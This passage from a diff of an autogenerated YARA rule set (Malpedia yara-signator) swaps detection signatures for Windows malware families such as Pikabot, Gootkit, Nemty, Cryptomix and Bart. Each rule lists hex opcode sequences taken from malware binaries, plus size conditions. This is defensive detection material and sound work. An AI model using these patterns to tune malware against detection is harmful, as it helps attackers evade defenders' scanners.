+		$sequence_7 = { 488d0d4c710000 8364242800 41b803000000 4533c9 }
+		$sequence_8 = { c3 4883ec28 e8???????? 488bc8 488d1501040100 }
+		$sequence_9 = { 4533f6 4863ce 488d3d20f90000 488bc1 }
 
 	condition:
-		7 of them and filesize < 688128
+		7 of them and filesize < 208896
 }
-rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE
+rule MALPEDIA_Win_Rokku_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "76543c5c-a591-5d27-b69f-6b94d6c2d536"
+		id = "5e0917d2-b33a-54a8-a28e-92ca643aac23"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neutrino_pos_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rokku_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "46f9a8dea2672570990106785d46980fe0790f0009b06412248bdd52d22cb9a1"
+		logic_hash = "5443b2e7560cc69ec04b0b3e247a5b78bf0ac816da2824e945b614a9052a8971"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118095,32 +118108,32 @@ rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a61 6689955cffffff 5a 6a6e 5f 6a75 5e }
-		$sequence_1 = { 8b45d8 8d443001 50 53 e8???????? 8bd8 }
-		$sequence_2 = { 56 57 e8???????? 59 59 8d4df8 51 }
-		$sequence_3 = { 51 53 33ff 57 ffd0 85c0 7433 }
-		$sequence_4 = { ff75fc ffd0 8945fc 3bc7 0f8580000000 }
-		$sequence_5 = { 8945e8 83f8ff 0f84a4000000 3bc3 0f849c000000 687823b2ff 56 }
-		$sequence_6 = { 5a 6a61 6689955cffffff 5a 6a6e }
-		$sequence_7 = { 66898d56ffffff 66898d58ffffff 66898d5affffff 66898d5cffffff 66898d5effffff 66898d60ffffff 66898d62ffffff }
-		$sequence_8 = { 58 6a43 8bc8 66898d4effffff 59 6a65 66898d50ffffff }
-		$sequence_9 = { 6a6e 66898558ffffff 58 6a62 6689855affffff 58 }
+		$sequence_0 = { 0bd0 c1e90e 8b442418 0bf1 33442444 }
+		$sequence_1 = { c1fb1a 01442420 8b442430 1154241c f76c2438 01442420 8b44246c }
+		$sequence_2 = { 8d54240c e8???????? a3???????? 33c0 c744240c5d786f7a c74424106b4c6f72 66c74424146b00 }
+		$sequence_3 = { 03d0 33ca 8954242c 8b542428 c1c10c 03d1 }
+		$sequence_4 = { 8bf1 89742408 85f6 745d 53 8b1e 57 }
+		$sequence_5 = { 83f917 72f0 8b0d???????? 88542439 8d542422 e8???????? }
+		$sequence_6 = { 8d7d28 53 8d5328 8bcf e8???????? 8b742448 83c550 }
+		$sequence_7 = { 894a0c 8b4c2420 0fa4c11a 8b4c2410 c1e01a 2bc8 8b842488000000 }
+		$sequence_8 = { 7517 8b0e 68???????? e8???????? 33c9 84c0 0f45cf }
+		$sequence_9 = { 41 83f905 7305 8a55ee ebee }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Fusiondrive_Auto : FILE
+rule MALPEDIA_Win_Cryptomix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ca3c35ba-09cb-56c8-bbe3-749cd9839eab"
+		id = "66a42334-0f35-544f-b73c-0df7b8e22035"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fusiondrive_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptomix_auto.yar#L1-L177"
 		license_url = "N/A"
-		logic_hash = "5e3043a82407e5acc0770d68c274349d0da53277a8b1605e4ac140328403150c"
+		logic_hash = "02f656068f4f76c12e869f1af5a2e63ec8e44cb4db7dffbbf055e2899960d03b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118134,34 +118147,40 @@ rule MALPEDIA_Win_Fusiondrive_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33db 4c8d35e14effff 4885db 750d 488bc7 498784f660de0100 eb1e }
-		$sequence_1 = { 4883ec28 488d0d75c60100 e8???????? 488d0da9f50000 4883c428 e9???????? }
-		$sequence_2 = { 660f6f05???????? f30f7f442470 66c745806557 c6458200 488d542470 488bc8 ff15???????? }
-		$sequence_3 = { 488dac2450feffff 4881ecb0020000 488b05???????? 4833c4 488985a0010000 4032ff }
-		$sequence_4 = { 4883c907 33ed 483bcf 7606 }
-		$sequence_5 = { 41894018 0fb60a 83e10f 4a0fbe8409a8150100 428a8c09b8150100 482bd0 8b42fc }
-		$sequence_6 = { e8???????? 488d0da9f50000 4883c428 e9???????? 4053 }
-		$sequence_7 = { 488d5202 83f902 72ea c605????????00 }
-		$sequence_8 = { 776a e8???????? 85c0 7428 85db 7524 488d0d92a30100 }
-		$sequence_9 = { 4c8d05e3e90000 83e23f 488bcf 48c1f906 488d14d2 498b0cc8 c644d13800 }
+		$sequence_0 = { 68???????? ffd0 683e8d61be 6a06 }
+		$sequence_1 = { ffb580efffff ff15???????? 56 68???????? ff15???????? 68???????? 68???????? }
+		$sequence_2 = { 85c0 0f87e0000000 68???????? 56 e8???????? 59 59 }
+		$sequence_3 = { 8be5 5d c3 3dc0ede0b7 }
+		$sequence_4 = { ffb5e0fbffff ff15???????? ff85e8fbffff 8d85e4fbffff 50 68???????? }
+		$sequence_5 = { 59 ff742408 ff742408 ffd0 c3 68c142487b 6a01 }
+		$sequence_6 = { 8b30 57 8b7dfc 68dee70218 6a05 e8???????? }
+		$sequence_7 = { 68???????? 8d85e8fbffff 50 ffd7 8d85c4f9ffff 50 8d85e8fbffff }
+		$sequence_8 = { 8bf9 e8???????? 83c40c 8d85e0fbffff 50 8d85f4fdffff 50 }
+		$sequence_9 = { c785e4fbffff04010000 ff15???????? 8d85e4fbffff 50 56 }
+		$sequence_10 = { 7571 b801000000 8b4dfc 33cd e8???????? 8be5 }
+		$sequence_11 = { 55 8bec 83ec10 57 33ff 6822ded78a }
+		$sequence_12 = { 6802f1f808 6a01 e8???????? 83c430 56 6880000000 }
+		$sequence_13 = { 33c0 8d95f4fdffff 6685c9 0f8465010000 0fb7c9 c1c007 }
+		$sequence_14 = { ff75f4 6a40 e8???????? 8bd8 }
+		$sequence_15 = { 59 8d4dfc 51 683f020f00 56 bb???????? 53 }
 
 	condition:
-		7 of them and filesize < 290816
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Pikabot_Auto : FILE
+rule MALPEDIA_Win_Xenarmor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4ac687d3-814a-53f0-bdd6-30b0d584e28f"
+		id = "55610d93-1ce0-5ea9-b26e-9c8f1380484b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pikabot_auto.yar#L1-L281"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xenarmor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xenarmor_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3b0362ab404ac85076078e4d22f7ab9dbd258b909dc0b4272cd29c1c8ac6cad3"
+		logic_hash = "10c19019c6e353e0437445c705fdac1c2ec6dd84cb0e3e79b7bc1280d736134b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118173,55 +118192,34 @@ rule MALPEDIA_Win_Pikabot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebd3 8b4508 c9 c3 55 8bec }
-		$sequence_1 = { 83ec0c 8b4508 8945fc 8b450c 8945f8 8b4510 }
-		$sequence_2 = { 837df400 741a 8b45fc 8b4df8 }
-		$sequence_3 = { 40 8945f8 ebd3 8b4508 }
-		$sequence_4 = { 8945f8 8b4510 8945f4 8b4510 }
-		$sequence_5 = { 8b4510 48 894510 837df400 741a }
-		$sequence_6 = { 8b4df8 8a09 8808 8b45fc 40 8945fc 8b45f8 }
-		$sequence_7 = { 7ce9 8b4214 2b420c 5f }
-		$sequence_8 = { 8a1c08 8d4320 0fb6c8 8d53bf 80fa19 0fb6c3 0f47c8 }
-		$sequence_9 = { 56 8bf1 85c9 7419 85d2 7415 }
-		$sequence_10 = { 85c9 7436 85ff 7432 }
-		$sequence_11 = { 0fabd0 83fa20 6a08 0f43c8 }
-		$sequence_12 = { e8???????? 8bd0 e8???????? 3b45fc }
-		$sequence_13 = { 41 e8???????? ffd0 c9 c3 }
-		$sequence_14 = { 6a08 0f43c8 33c1 83fa40 }
-		$sequence_15 = { 3bc7 72d5 5b 5f 8bc6 }
-		$sequence_16 = { 83ec10 53 56 8b35???????? b84d5a0000 57 8955fc }
-		$sequence_17 = { 8a040a 84c0 75f6 c60100 8bc6 5e c3 }
-		$sequence_18 = { 0fb6d1 03c2 0fb6c0 8945f8 }
-		$sequence_19 = { 81f900010000 72f0 8bf0 33d2 }
-		$sequence_20 = { 0345f8 03c8 0fb6c9 894df8 }
-		$sequence_21 = { 40 3d00010000 72f1 8b35???????? 8bf9 }
-		$sequence_22 = { 0345f8 03c8 0fb6c1 8945f8 }
-		$sequence_23 = { 8b01 0d20202020 3d6e74646c 750f }
-		$sequence_24 = { a3???????? 8b45d4 890424 a1???????? ff5058 56 }
-		$sequence_25 = { 89442408 31c0 89442404 e8???????? 8b45e4 }
-		$sequence_26 = { 890424 e8???????? 8b8514f9ffff 89442404 a1???????? }
-		$sequence_27 = { 890424 e8???????? 8b8560f9ffff 89442404 }
-		$sequence_28 = { 890424 e8???????? 89c2 a1???????? 895048 }
-		$sequence_29 = { a1???????? 8b00 890424 e8???????? a1???????? 8b9060010000 89542404 }
-		$sequence_30 = { 890424 a1???????? ff9090000000 83ec10 }
+		$sequence_0 = { f7f9 8b8d64ffffff 6640 66034616 8bd0 e8???????? f7462440010000 }
+		$sequence_1 = { e8???????? 8bf0 83c418 85f6 0f84ed000000 8d8584e5ffff 8d8dfcd1ffff }
+		$sequence_2 = { e8???????? 50 8d4d08 c645fc03 e8???????? c645fc00 8bc7 }
+		$sequence_3 = { e9???????? ff7304 8b53bc ff73e0 8b4d0c e8???????? 83c408 }
+		$sequence_4 = { ff742428 ba56000000 ff742428 e8???????? 83c40c eb33 8b542420 }
+		$sequence_5 = { 8bf0 e8???????? 8b5df0 8bf8 57 56 ba35000000 }
+		$sequence_6 = { 8d8ff8000000 e8???????? 895de8 c745e4d4ee6800 ff750c 8d4de4 895dfc }
+		$sequence_7 = { f6400408 0f8589000000 83783000 8b44246c 741c 85c0 7518 }
+		$sequence_8 = { ba74000000 e8???????? 83c40c eb37 8d4201 89416c 8d0c92 }
+		$sequence_9 = { 8bce e8???????? 685e010000 8bce e8???????? 8b86a8b30500 038690b30500 }
 
 	condition:
-		7 of them and filesize < 1717248
+		7 of them and filesize < 10894336
 }
-rule MALPEDIA_Win_Casper_Auto : FILE
+rule MALPEDIA_Win_Gootkit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2a62877-f95a-5635-83dc-ecf2c1bcc8c6"
+		id = "cc674f83-d3cc-5cc6-8f48-f7ded72789f2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.casper_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gootkit_auto.yar#L1-L334"
 		license_url = "N/A"
-		logic_hash = "51f38b9a318c7cdad54224577e1ce438c8182ba77e67e0978d20f3d358b38e98"
+		logic_hash = "e886088177ff2cbe60c39328c9402db705beff1123d5a11d85e3c6ea020086bf"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118233,32 +118231,59 @@ rule MALPEDIA_Win_Casper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 59 8d4df8 51 6a01 50 6801000080 }
-		$sequence_1 = { 88471c 8a4626 88471d 8b4624 59 c1e808 59 }
-		$sequence_2 = { 83c40c ff7010 8d8560fdffff 68???????? 50 }
-		$sequence_3 = { 832600 83661400 894608 c7461000100000 e8???????? 8945fc a1???????? }
-		$sequence_4 = { 8d8500ffffff 50 ff7510 e8???????? 83c410 8d8500ffffff 50 }
-		$sequence_5 = { 897808 eb02 33c0 8930 897804 8b4b10 }
-		$sequence_6 = { 5e 40 5b c9 c21000 8b8118010000 c3 }
-		$sequence_7 = { 8a01 84c0 75f1 8b4d08 52 ff7510 }
-		$sequence_8 = { 81e200008000 52 57 57 57 ff75a8 ff34850ca14200 }
-		$sequence_9 = { 2bc6 03450c 50 ff7508 e8???????? }
+		$sequence_0 = { 41 3bca 72f2 56 6a00 ff15???????? }
+		$sequence_1 = { 3bca 72f2 335df0 6a10 58 }
+		$sequence_2 = { 33c0 85c9 0f444508 5d c20400 }
+		$sequence_3 = { 50 56 ff15???????? 56 ffd7 8bd0 33ff }
+		$sequence_4 = { 59 85c0 740c 8b30 33ff 0375dc }
+		$sequence_5 = { 8b840888000000 eb04 8b440878 03c1 c3 }
+		$sequence_6 = { e8???????? 8b5dfc ff75f4 6a00 ff15???????? }
+		$sequence_7 = { 894df4 50 ff75fc ffd7 85c0 744b }
+		$sequence_8 = { f3aa 68???????? ff15???????? 50 }
+		$sequence_9 = { 8b7df4 32c0 8b4de4 f3aa }
+		$sequence_10 = { 50 68???????? ff15???????? 85c0 7505 e8???????? }
+		$sequence_11 = { 50 e8???????? 83c40c 68fd000000 }
+		$sequence_12 = { 50 8b4508 8b00 99 }
+		$sequence_13 = { c705????????01000000 c705????????02000000 8be5 5d }
+		$sequence_14 = { 833d????????00 750a 6a32 ff15???????? }
+		$sequence_15 = { e8???????? 6a0c 6a08 ff15???????? 50 ff15???????? }
+		$sequence_16 = { 6808020000 6a00 ff15???????? 50 }
+		$sequence_17 = { 6a02 ff15???????? 6888130000 ff15???????? }
+		$sequence_18 = { e8???????? 8d45fc 50 6a01 6a01 6a00 6800000002 }
+		$sequence_19 = { e8???????? 85c0 750c c705????????03000000 }
+		$sequence_20 = { 8b4508 8b00 99 52 50 6a00 }
+		$sequence_21 = { 53 53 53 8901 }
+		$sequence_22 = { 0f114f20 0f104840 0f114730 0f104050 0f114f40 0f104860 0f114750 }
+		$sequence_23 = { 754c 8b5e02 8d45e4 6a1c 50 }
+		$sequence_24 = { 03c1 3bd8 7323 8b33 }
+		$sequence_25 = { 85c0 56 0f45ca 894dfc ff15???????? }
+		$sequence_26 = { 8b4c2434 ff15???????? 0fb74c2432 ff15???????? }
+		$sequence_27 = { 0f104010 0f110f 0f104820 0f114710 0f104030 0f114f20 0f104840 }
+		$sequence_28 = { 8b4070 894770 be01000000 ff15???????? }
+		$sequence_29 = { 0f104060 0f114760 8b4070 894770 }
+		$sequence_30 = { 7510 8d4864 ff15???????? ffc3 83fb0a }
+		$sequence_31 = { c602e9 2bc8 894a01 83c205 8b4610 33c9 }
+		$sequence_32 = { 0f104860 0f114750 0f114f60 b801000000 }
+		$sequence_33 = { 8b4de8 b84d5a0000 663901 754e 8b513c 03d1 813a50450000 }
+		$sequence_34 = { ffc3 83fb0a 7cd5 33c0 }
+		$sequence_35 = { ffd3 8b8de4fdffff 8b36 85f6 75a2 8b3f 85ff }
+		$sequence_36 = { 8b7df4 85ff 7414 57 8bce e8???????? }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 516096
 }
-rule MALPEDIA_Win_Bamital_Auto : FILE
+rule MALPEDIA_Win_Cinobi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e219e6ea-4608-5a74-87dd-c6cc7daca55c"
+		id = "21772936-199b-55b9-8c88-84909fbe932b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bamital_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cinobi_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "24d30014c19935766f45a136deb9c4126e6e7e91127fb6207f37108ee605d496"
+		logic_hash = "3b7b598c2d1d5a6445b3767b26d122931b2d9423a26b8573ddc77c7b26c5617b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118272,32 +118297,37 @@ rule MALPEDIA_Win_Bamital_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 803820 7516 83c101 83f901 7504 8bd0 }
-		$sequence_1 = { 2945f8 ff75f8 e8???????? 5e ff75f8 56 }
-		$sequence_2 = { 33c0 5e 5f 5b 5a 59 }
-		$sequence_3 = { 52 e8???????? 837dd800 7505 e9???????? }
-		$sequence_4 = { b910000000 f3ab eb0c 8bcb f3a4 011d???????? }
-		$sequence_5 = { 8b55fc 8945fc 0bd2 7406 52 e8???????? }
-		$sequence_6 = { 5b 5a 59 c9 c21000 33c0 5e }
-		$sequence_7 = { 83c024 6a00 50 e8???????? }
-		$sequence_8 = { 75f1 8d0411 33c2 5f 5e c9 }
-		$sequence_9 = { e8???????? 83c708 57 ff7004 e8???????? 83c708 }
+		$sequence_0 = { c9 c3 55 8bec 51 e8???????? 58 }
+		$sequence_1 = { 660fbe404b 668985a0fdffff 8b45f8 660fbe4005 668985a2fdffff 8b45f8 660fbe4005 }
+		$sequence_2 = { 55 8bec 83ec44 53 e8???????? }
+		$sequence_3 = { 8845ce c645cf00 8b45c0 8a4031 }
+		$sequence_4 = { 6805100000 56 8b75f0 56 ff93f7000000 }
+		$sequence_5 = { 8365dc00 8945e0 8d45fc 8945e4 8d45f4 }
+		$sequence_6 = { 50 51 ff93eb000000 8b4df4 e8???????? 8bf8 }
+		$sequence_7 = { 57 8b7dd0 894dfc 3bcb 7504 33c0 eb2c }
+		$sequence_8 = { 8a4d0c 8808 ebe5 c9 c3 }
+		$sequence_9 = { 8845fb 8d45a4 50 ff7508 e8???????? 59 }
+		$sequence_10 = { 8b45f4 ff90db000000 8945ec 837decff 7513 }
+		$sequence_11 = { 8b4510 8945ec 8b45e4 8b4dfc 8b0481 034508 }
+		$sequence_12 = { 837de000 0f85ac000000 6a02 8d87c0120000 50 }
+		$sequence_13 = { 8a5832 885dd1 8a5834 885dd2 }
+		$sequence_14 = { 837de8ff 7507 32c0 e9???????? 6a00 ff75e8 8b45f4 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 32768
 }
-rule MALPEDIA_Win_October_Seventh_Auto : FILE
+rule MALPEDIA_Win_Rambo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c923fdd4-c954-5dde-bdcd-f3b77326ae47"
+		id = "339a4d7e-9b02-5b2f-918a-fe5abee15d73"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.october_seventh"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.october_seventh_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rambo_auto.yar#L1-L180"
 		license_url = "N/A"
-		logic_hash = "552e719a27839e5d3f04d1c3619c82bb79d38c4fb51bdf6c68df34e2e7210a4c"
+		logic_hash = "5e0ac76c4c54838a65e8020ef5ae20ae2814aaf559d8acf1871f9f9e1fb0aa1a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118311,32 +118341,38 @@ rule MALPEDIA_Win_October_Seventh_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81784870034200 7409 ff7048 e8???????? 59 8b45fc }
-		$sequence_1 = { 80ba????????3f 76f3 2bcf 49 8d4103 99 }
-		$sequence_2 = { 50 8b8598f8ffff 0fb7048544cb4100 8d048540c24100 }
-		$sequence_3 = { ff35???????? 89442410 e8???????? 8bf0 83c408 }
-		$sequence_4 = { 8b0cbdd08fd500 c644112900 837dfc00 7507 b800800000 eb1e 84db }
-		$sequence_5 = { 8b45d4 0345b4 48 e9???????? 8b0c85d08fd500 }
-		$sequence_6 = { 33c0 5b 8be5 5d c3 8b4018 33f6 }
-		$sequence_7 = { 68???????? a3???????? ffd0 ba???????? b9???????? 8bf0 }
-		$sequence_8 = { 7470 eb17 be???????? 68???????? e8???????? 83c404 }
-		$sequence_9 = { 46 3b75f0 72c5 eb0f 8b45f4 8b7dfc 0fb70470 }
+		$sequence_0 = { 8d85f8faffff 6a01 50 ff15???????? 80a43df8faffff00 56 }
+		$sequence_1 = { 8065fe00 8d45fc 50 8d85f8feffff 50 c645fc72 }
+		$sequence_2 = { ff15???????? 83c428 6a32 ff15???????? 8d85f8faffff 50 }
+		$sequence_3 = { 83c410 85f6 745e 57 6a02 }
+		$sequence_4 = { 8d85ecfdffff 50 8d85f0feffff 50 ff15???????? 83c41c }
+		$sequence_5 = { 50 68???????? e8???????? 59 59 6a01 58 }
+		$sequence_6 = { 81ec14020000 8d85f0feffff 56 50 6804010000 }
+		$sequence_7 = { 59 8d85fcfeffff 59 50 ff15???????? 33c0 }
+		$sequence_8 = { 0f85ba000000 8d4c241c c68424000400000f e8???????? 8d8c249c000000 c68424000400000b e8???????? }
+		$sequence_9 = { 33c0 50 8d4c241c c684240404000002 }
+		$sequence_10 = { 03dd 33c3 8d1c31 33c3 81c14786c861 2bf8 4a }
+		$sequence_11 = { 57 b940000000 8d7c240d 8844240c f3ab 66ab }
+		$sequence_12 = { 56 56 8d4c2424 e8???????? 50 8d4c246c e8???????? }
+		$sequence_13 = { c684240004000001 e8???????? c684240004000000 8d4c2464 e8???????? 8d4c242c c7842400040000ffffffff }
+		$sequence_14 = { 33ed 6804010000 6804010000 8d4c2434 89ac2408040000 e8???????? }
+		$sequence_15 = { 8d4c2414 6a20 51 8d4c2424 e8???????? 50 8d4c242c }
 
 	condition:
-		7 of them and filesize < 19859456
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Nemty_Auto : FILE
+rule MALPEDIA_Win_Bart_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cdf39d25-7035-553c-816d-fe9d35a19962"
+		id = "69293053-9c73-5e85-bfc8-1bda4f3480af"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nemty_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bart_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "3672eaf2e9c4783f20e7f6ec877d618670612c5d8376e42a0d5a0e87ba0dbd7a"
+		logic_hash = "3bd63c0862e680fa10847ed0fefa7078e2170f430f6b6047eb709673a0606c78"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118350,32 +118386,32 @@ rule MALPEDIA_Win_Nemty_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6bf61c 8b45e8 03f0 897308 6bff1c }
-		$sequence_1 = { e8???????? 53 8d75e0 e8???????? 8b4dfc 5f 5e }
-		$sequence_2 = { e8???????? 6a01 33ff 8d7508 e8???????? 8b4dfc }
-		$sequence_3 = { 83c61c 3bd8 72c0 68???????? }
-		$sequence_4 = { ff15???????? 53 8d459c 50 ff35???????? }
-		$sequence_5 = { e8???????? 33db 43 53 33ff 8d75e0 e8???????? }
-		$sequence_6 = { c20400 8b4f04 53 8bd8 56 }
-		$sequence_7 = { 5f f7ff 43 83c61c 3bd8 72c0 }
-		$sequence_8 = { 837d3810 8bf8 8b4524 59 7303 8d4524 837d3810 }
-		$sequence_9 = { 50 56 6806000200 6a01 56 56 68???????? }
+		$sequence_0 = { 74d1 68ffffff00 50 8d45d8 8bce 50 e8???????? }
+		$sequence_1 = { 8d4dbc e8???????? 8b8558ffffff 8d8d7cffffff 8b9550ffffff 0fb600 }
+		$sequence_2 = { 8d4dd4 eb55 84db 755a 6a02 5a 8d4de4 }
+		$sequence_3 = { 48 0fb7c0 6683f801 7e7e }
+		$sequence_4 = { 53 56 57 8d45b8 8955ec 8bf9 50 }
+		$sequence_5 = { ffb63c010000 53 ffd7 83c40c 3b461c 75e1 33c0 }
+		$sequence_6 = { 8bfa 8bd9 384601 7e11 }
+		$sequence_7 = { 8bec 53 56 8bd9 57 33ff 397b48 }
+		$sequence_8 = { 0f840c010000 57 ff15???????? 6800ff0000 ffd3 8bf8 85ff }
+		$sequence_9 = { 50 8b83b0000000 ffd0 8b95c8feffff 8b8db8feffff 53 56 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Nitrogen_Auto : FILE
+rule MALPEDIA_Win_Alphanc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75d54911-9963-5fa1-94d4-824f367ba5ac"
+		id = "44e5cd2d-dd6f-5dec-8633-e36984c0d4b0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitrogen"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nitrogen_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alphanc_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "5f8ac2a7555dea7311ca047ff8fe4bf1acad1a9235530176528b358f16735fc3"
+		logic_hash = "d03fa53d22f05f45f0bb38627a16b1b71ce74e44da84ac0b88c2ab879180e110"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118389,34 +118425,32 @@ rule MALPEDIA_Win_Nitrogen_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8905???????? 488b05???????? 48ffc0 488905???????? }
-		$sequence_1 = { 4898 488905???????? 8b05???????? 488905???????? }
-		$sequence_2 = { 488b05???????? 89442454 8b05???????? 89442458 }
-		$sequence_3 = { 4898 488905???????? 488b05???????? 4885c0 }
-		$sequence_4 = { 0fbe05???????? c1e002 4898 488905???????? }
-		$sequence_5 = { 668905???????? 488b05???????? 48ffc8 488905???????? }
-		$sequence_6 = { 668905???????? 8b05???????? 668905???????? 8b05???????? }
-		$sequence_7 = { eb35 488b05???????? 4885c0 7429 }
-		$sequence_8 = { 8b05???????? ffc0 8905???????? 0fb705???????? }
-		$sequence_9 = { 668905???????? 8b05???????? ffc8 8905???????? }
-		$sequence_10 = { 0fb6c0 8905???????? 8b05???????? 85c0 }
-		$sequence_11 = { 8905???????? 488b05???????? 480faf05???????? 488905???????? }
+		$sequence_0 = { ff15???????? 8d45f0 8d4de8 50 51 ff15???????? 57 }
+		$sequence_1 = { 8d044544ce4e00 eb59 8d044542ce4e00 eb50 f6c303 740d 0fb74208 }
+		$sequence_2 = { 8b6c2424 55 56 e8???????? 8b542458 83c408 8d4aff }
+		$sequence_3 = { bf50000000 6a41 e9???????? 56 e8???????? 83c404 85c0 }
+		$sequence_4 = { e8???????? 85c0 7526 8a4b7c 8a142e 32d1 6857a0a6f8 }
